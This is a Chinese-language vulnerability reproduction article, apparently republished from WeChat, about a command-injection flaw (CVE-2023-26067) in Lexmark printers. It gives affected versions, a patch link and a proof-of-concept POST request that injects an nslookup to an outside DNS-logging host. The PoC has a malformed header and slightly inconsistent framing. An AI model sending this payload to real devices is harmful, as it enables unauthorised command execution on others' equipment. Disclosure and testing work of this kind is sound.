Lexmark远程代码执行漏洞(CVE-2023-26067)
2023-8-14 14:9:41 Author: mp.weixin.qq.com(查看原文) 阅读量:7 收藏

网安引领时代,弥天点亮未来   

0x00写在前面
本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
0x01漏洞介绍

Lexmark是美国的一系列打印机。Lexmark设备的一个受信任的内部组件存在输入验证漏洞。已经破坏了设备的攻击者可以利用此漏洞来升级权限。

Certain Lexmark devices 2023-02-19版本及之前版本存在安全漏洞,该漏洞源于Lexmark设备错误处理输入验证。

0x02影响版本

Certain Lexmark devices 2023-02-19版本及之前版本存在安全漏洞

0x03漏洞复现

1.访问漏洞环境

2.对漏洞进行复现

 POC (POST)

POST /cgi-bin/fax_change_faxtrace_settings HTTP/1.1Hos: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36Connection: closeContent-Length: 72Accept-Encoding: gzip, deflate
FT_Custom_lbtrace=$(nslookup h42ojm.dnslog.cn)

漏洞复现

        POST请求, ndslog测试存在漏洞

生成测试域名

      nslookup解析,漏洞存在。

3.nuclei测试(漏洞存在)

0x04修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://publications.lexmark.com/publications/security-alerts/CVE-2023-26067.pdf


文章来源: https://mp.weixin.qq.com/s?__biz=MzI2MzA3OTgxOA==&mid=2657164625&idx=1&sn=d5d74b11c433aab63bd093ab7cc75982&chksm=f1d4efb4c6a366a2a47763e8dfab958667fa4919d50279c8f224ea72a37d91deb7633a482e73&scene=58&subscene=0#rd
如有侵权请联系:admin#unsafe.sh